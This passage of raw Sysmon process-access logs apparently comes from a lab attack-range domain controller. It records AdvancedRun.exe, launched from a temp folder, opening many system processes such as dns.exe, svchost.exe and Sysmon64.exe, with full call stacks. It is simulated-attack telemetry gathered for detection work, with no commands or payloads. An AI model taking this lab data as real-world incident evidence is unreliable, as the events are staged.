xe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004080460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
